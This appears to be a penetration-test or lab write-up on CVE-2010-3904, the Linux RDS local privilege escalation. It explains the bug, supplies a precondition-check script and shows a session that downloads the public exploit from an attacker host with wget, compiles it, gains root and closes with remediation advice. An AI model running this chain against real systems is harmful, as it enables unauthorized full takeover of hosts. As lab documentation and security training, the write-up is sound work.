CVE-2010-3904


PEAS flagged the target kernel as vulnerable to CVE-2010-3904 (confirmed below by exploitation).

A local privilege escalation vulnerability rated critical exists in the Reliable Datagram Sockets (RDS) implementation of the Linux kernel, affecting versions 2.6.30 (where RDS was introduced) up to and including the 2.6.36 release candidates; it is fixed in 2.6.36. The affected function is rds_page_copy_user in net/rds/page.c, which copied data to and from user-supplied addresses during RDS sendmsg/recvmsg processing using the unchecked __copy_to_user_inatomic / __copy_from_user_inatomic helpers, skipping the access_ok() range check. The issue is catalogued as CWE-1284 (improper validation of a specified quantity in input); in practice it is a missing address validation. Because the copy destination is never checked, an unprivileged local user who can create an RDS socket can write attacker-controlled data into arbitrary kernel memory and gain kernel-mode code execution. Impact: full loss of confidentiality, integrity and availability of the host. Note that distribution kernels backported the fix under their own version numbers, so a version string alone does not prove exposure.
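Before spending time on the exploit it is worth checking the two preconditions it depends on: a kernel in the affected range and an RDS protocol that is loaded or can be autoloaded. The following POSIX sh script is an added example written for this page; it is not part of the PEAS output or of the exploit. It assumes the conventional locations (/proc/net/protocols listing the registered "RDS" protocol, module files under /lib/modules/$(uname -r), and the modprobe.d "install rds /bin/true" workaround used to neutralise this bug on systems that do not need RDS). The version test is only a hint, since distribution kernels carry backported fixes under older version strings; the module test is the one that actually matters.

```shell
#!/bin/sh
# Added pre-exploitation check for CVE-2010-3904 (example script, not from the
# original report or the exploit). The RDS exploit needs two things to hold:
#   1. the running kernel is in the affected range: 2.6.30 <= release < 2.6.36,
#      or a 2.6.36 release candidate (2.6.36 final contains the fix);
#   2. the RDS protocol is registered or its module can still be autoloaded
#      (i.e. it has not been disabled with "install rds /bin/true").

# kernel_in_affected_range RELEASE -> exit 0 if RELEASE is in the affected range.
# Accepts `uname -r` strings such as "2.6.32-5-686", "2.6.32.27" or "2.6.36-rc8".
kernel_in_affected_range() {
    rel=$1
    is_rc=0
    case "$rel" in *-rc*) is_rc=1 ;; esac
    base=${rel%%-*}                      # "2.6.32-5-686" -> "2.6.32"
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    [ "$patch" = "$rest" ] && patch=0    # no third component at all
    patch=${patch%%[!0-9]*}              # "32.27" -> "32", "36rc" -> "36"
    [ -z "$patch" ] && patch=0
    [ "$major" -eq 2 ] 2>/dev/null || return 1
    [ "$minor" -eq 6 ] 2>/dev/null || return 1
    if [ "$patch" -ge 30 ] && [ "$patch" -lt 36 ]; then
        return 0
    fi
    # 2.6.36-rcN was still vulnerable; 2.6.36 final is not
    [ "$patch" -eq 36 ] && [ "$is_rc" -eq 1 ]
}

# rds_reachable -> exit 0 if RDS is already registered or its module is loadable.
rds_reachable() {
    mods_dir=/lib/modules/$(uname -r)
    # Already registered (built in, or module loaded): first column of /proc/net/protocols
    if grep -qs '^RDS ' /proc/net/protocols; then
        return 0
    fi
    # Standard workaround: "install rds /bin/true" makes autoloading a no-op
    if grep -rqs '^[[:space:]]*install[[:space:]][[:space:]]*rds[[:space:]]' \
            /etc/modprobe.d /etc/modprobe.conf; then
        return 1
    fi
    # Module file present? find exits 0 even with no match, so test its output
    [ -n "$(find "$mods_dir" -name 'rds.ko*' 2>/dev/null)" ]
}

# assess RELEASE -> prints a verdict line; exit 0 only if both preconditions hold.
assess() {
    rel=$1
    if ! kernel_in_affected_range "$rel"; then
        echo "[-] $rel is outside 2.6.30..2.6.36-rcN; the RDS exploit does not apply"
        return 1
    fi
    if ! rds_reachable; then
        echo "[-] $rel is in range but RDS is neither loaded nor loadable (absent or blacklisted)"
        return 1
    fi
    echo "[+] $rel is in range and RDS is reachable; worth running the exploit"
}

if assess "$(uname -r)"; then
    echo "[*] Proceed with ./CVE-2010-3904"
else
    echo "[*] Do not expect the RDS exploit to work on this host"
fi
```

A "[+]" verdict still only means the preconditions are met, not that the kernel is unpatched; a distribution may have backported the fix. The authoritative test remains running the exploit, which on a patched kernel simply fails to escalate.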

Exploit


A public exploit by Dan Rosenberg (the one whose banner appears below) is available for this issue. It resolves the kernel symbols it needs from /proc/kallsyms, uses the unchecked RDS copy to overwrite the ioctl entry of rds_proto_ops with the address of a user-space payload that calls commit_creds(prepare_kernel_cred(0)), triggers the payload with an ioctl() on an RDS socket, and restores the original pointer afterwards. It relies on the kernel being willing to execute user-space pages from ring 0, which held for the kernels and hardware of that era.

Exploitation


www-data@offsecsrv:/var/tmp$ wget -q http://192.168.45.192/CVE-2010-3904.c
www-data@offsecsrv:/var/tmp$ gcc CVE-2010-3904.c -o CVE-2010-3904

The exploit was delivered to the target over HTTP and compiled there with gcc. The target has a working compiler; if it did not, the source would have to be built on a system matching the target's architecture and libc and the binary transferred instead. The resolved addresses in the output below (0xc0...) are consistent with a 32-bit x86 kernel.

www-data@offsecsrv:/var/tmp$ ./CVE-2010-3904
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved rds_proto_ops to 0xf821f980
 [+] Resolved rds_ioctl to 0xf8219090
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
whoami
root
# hostname
hostname
offsecsrv
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:50:56:9e:5f:f6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.132.41/24 brd 192.168.132.255 scope global eth0
    inet6 fe80::250:56ff:fe9e:5ff6/64 scope link 
       valid_lft forever preferred_lft forever

System-level compromise: a root shell on offsecsrv (192.168.132.41). Remediation is to move to a kernel that contains the fix (2.6.36 or a distribution kernel with the patch backported) or, where RDS is not needed, to stop the module from loading with an "install rds /bin/true" line in /etc/modprobe.d, which removes the attack surface without a kernel change.